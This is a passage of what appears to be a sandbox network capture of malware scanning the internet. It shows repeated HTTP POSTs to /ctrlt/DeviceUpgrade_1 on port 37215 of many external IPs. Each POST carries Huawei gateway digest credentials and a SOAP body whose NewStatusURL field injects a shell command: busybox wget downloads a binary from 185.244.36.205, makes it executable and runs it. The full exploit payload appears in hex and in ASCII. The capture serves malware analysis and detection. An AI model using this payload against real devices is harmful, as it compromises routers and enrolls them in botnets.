                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1878192.168.2.154844641.236.198.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948573112 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1879192.168.2.1553172181.122.116.25137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948586941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1880192.168.2.155140837.224.239.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948595047 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1881192.168.2.153631845.174.204.16737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948615074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1882192.168.2.154173637.101.152.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948632002 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1883192.168.2.1555960143.0.180.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948652983 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1884192.168.2.153682237.191.108.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948678017 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1885192.168.2.1543500181.248.85.21437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948694944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1886192.168.2.1546130181.182.161.3137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948714018 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1887192.168.2.153901294.53.180.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.948738098 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
